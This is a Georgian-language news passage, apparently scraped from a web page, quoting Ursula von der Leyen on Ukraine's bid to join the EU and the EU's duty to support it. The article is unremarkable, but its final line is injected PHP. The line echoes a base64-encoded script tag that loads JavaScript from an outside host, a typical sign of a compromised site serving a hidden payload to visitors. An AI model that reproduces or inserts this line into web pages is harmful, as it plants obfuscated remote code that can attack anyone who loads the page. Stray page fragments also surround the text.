celsiusi
ავერსი შნაიდერი
უკრაინელები ძალიან მამაცურად იბრძვიან, რადგან მათ ზუსტად იციან, რა სახის მომავალი სურთ – თავისუფალი და ღია საზოგადოების მომავალი, ძლიერი დემოკრატიული საზოგადოების კუთვნილება. უკრაინელებს სურთ ევროკავშირში გაწევრიანება, – ამის შესახებ ურსულა ფონ დერ ლაიენმა განაცხადა.
 
მისი თქმით, ევროკავშირისკენ მიმავალ გზაზე უკრაინას მხარდაჭერა სჭირდება.
 
„ვფიქრობ, ჩვენი არა მხოლოდ სტრატეგიული ინტერესი, არამედ მორალური ვალდებულებაა, რომ ეს განხორციელდეს და ისინი შეუერთდნენ ევროკავშირს, ჩვენ ვუხსნით გზას ჩვენი კავშირისკენ. ნება მიბოძეთ გითხრათ, რატომ არის ასეთი მნიშვნელოვანი ინვესტირებისა და რეფორმის დაკავშირება. ევროკავშირში გაწევრიანების პროცესში ჩვენი სტანდარტები და პირობები უნდა დაკმაყოფილდეს. ეს არ არის არც ექსკლუზიური ნებართვა და არც მოკლე მარშრუტი, მაგრამ რამდენად სწრაფად წარიმართება პროცესი, ეს დამოკიდებულია თავად ქვეყანაზე და ჩვენ მხარდაჭერაზე. ევროკავშირში ვიცით, ყოველდღიურად რამდენად რთულია, რომ ეს სტანდარტები შენარჩუნებული იყოს 27 წევრს შორის. ეს ასე უნდა იყოს, მაგრამ ჩვენზეა დამოკიდებული, რამდენად დავეხმარებით და მოვახდენთ ინვესტირებას, ეს არის უკრაინელი მეგობრების ხელში, რას გააკეთებენ ამისგან. უკრაინის ლტოლვა და მისწრაფებები არის ასახვა იმის, თუ რას მივაღწიეთ ჩვენ ერთად გასული 77 წლის განმავლობაში. პრეზიდენტმა ზელენსკიმ თქვა, რომ ეს არ არის ტვირთი, ეს პასუხისმგებლობაა და ეს უნდა იყოს ჩვენი დევიზი მხარი დავუჭიროთ უკრაინას ევროკავშირის გზაზე. ეს არ არის ტვირთი, ეს ჩვენი ისტორიული პასუხისმგებლობაა. გაუმარჯოს ევროპას, დიდება უკრაინას“, – განაცხადა ურსულა ფონ დერ ლაიენმა.
689
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");